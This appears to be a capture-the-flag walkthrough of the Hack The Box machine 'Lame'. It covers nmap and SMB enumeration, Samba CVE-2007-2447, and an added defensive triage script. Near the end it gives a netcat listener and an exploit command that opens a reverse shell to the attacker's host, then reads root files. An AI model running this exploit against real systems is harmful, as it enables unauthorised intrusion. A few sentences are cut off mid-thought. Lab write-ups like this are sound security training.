Lame is an easy Linux box that can be exploited with CVE-2007-2447; no privilege escalation is required.
Nmap discovered the following open ports and services:
nmap -sC -sV -Pn -oN fullnmap 10.129.24.78

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.33
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
The first thing I checked was Anonymous login with FTP:
ftp 10.129.24.78
Connected to 10.129.24.78.
220 (vsFTPd 2.3.4)
Name (10.129.24.78:jeroen): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
FTP Anonymous Login
Anonymous login was successful (username: anonymous, password: blank). Unfortunately, no useful information was found here.
The next thing was to enumerate SMB with smbmap to check for shares and permissions:
smbmap -H 10.129.24.78
[+] IP: 10.129.24.78:445    Name: 10.129.24.78
        Disk        Permissions    Comment
        ----        -----------    -------
        print$      NO ACCESS      Printer Drivers
        tmp         READ, WRITE    oh noes!
        opt         NO ACCESS
        IPC$        NO ACCESS      IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$      NO ACCESS      IPC Service (lame server (Samba 3.0.20-Debian))
The tmp share is both readable and writable. You can connect with:
The share contained the following files and directories:
smb: \> ls
  .              D      0  Mon Oct 19 14:08:46 2020
  ..             DR     0  Sun May 20 19:36:12 2012
  5303.jsvc_up   R      0  Mon Oct 19 12:57:23 2020
  .ICE-unix      DH     0  Mon Oct 19 12:56:14 2020
  vmware-root    DR     0  Mon Oct 19 12:56:22 2020
  .X11-unix      DH     0  Mon Oct 19 12:56:36 2020
  .X0-lock       HR    11  Mon Oct 19 12:56:36 2020
No sensitive files or information were found here.
The next step was to search for the Samba version that nmap reported on the netbios-ssn port:
netbios-ssn Samba smbd 3.0.20-Debian
This search turned up CVE-2007-2447, which could potentially be used to exploit the target.
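As an added example that is not part of the original writeup, the following Python script parses the nmap -oN output from the scan above and flags the two weaknesses the scan exposed: anonymous FTP login and a Samba version inside the range affected by CVE-2007-2447. The affected range (Samba 3.0.0 up to 3.0.25rc3, fixed in 3.0.25) and the mitigation (upgrade, and do not set the "username map script" option in smb.conf) are taken from the CVE description, not from the page.

```python
import re

# Constructed sample input: the service lines from the nmap -oN scan above.
NMAP_OUTPUT = """21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# major.minor.patch with an optional rcN suffix; "3.X - 4.X" style guesses do not match.
VER_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(rc\d+)?")

def parse_nmap(text):
    """Return one dict per port line; NSE script lines ("|", "|_") attach to the preceding port."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            ports.append({"port": int(port), "proto": proto, "state": state,
                          "service": service, "version": version, "scripts": []})
        elif line.startswith("|") and ports:
            ports[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return ports

def version_tuple(s):
    """(major, minor, patch, is_final); rc builds get is_final=0 so they sort below the final release."""
    m = VER_RE.search(s)
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), 0 if rc else 1)

def triage(ports):
    """Return (port, finding) tuples for the weaknesses this scan exposed."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        if any(s.startswith("ftp-anon:") and "allowed" in s for s in p["scripts"]):
            findings.append((p["port"], "anonymous FTP login enabled; disable unless required"))
        v = version_tuple(p["version"])
        # Samba 3.0.0 <= v < 3.0.25 (3.0.25 is the fixed release) is affected by CVE-2007-2447.
        if "Samba" in p["version"] and v and (3, 0, 0, 1) <= v < (3, 0, 25, 1):
            findings.append((p["port"], "Samba affected by CVE-2007-2447; upgrade and ensure "
                                        "'username map script' is not set in smb.conf"))
    return findings
```

Calling triage(parse_nmap(NMAP_OUTPUT)) flags port 21 (anonymous FTP) and port 445 (Samba 3.0.20); the "3.X - 4.X" guess on port 139 carries no exact version and is skipped.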
The exploit script usermap_script.py was downloaded to exploit this manually.
A netcat listener was opened:
nc -nvlp 4444
and the following command was used:
python3 usermap_script.py 10.129.24.78 139 10.10.14.33 4444
This opens a shell in the netcat listener, from where you can change to the home directory and list the users:
cd /home
ls
ftp  makis  service  user
The user makis contains the
To obtain root, you can simply cat
cat /home/makis/user.txt && cat /root/root.txt
69454a937d9[...]
92caac3be14[...]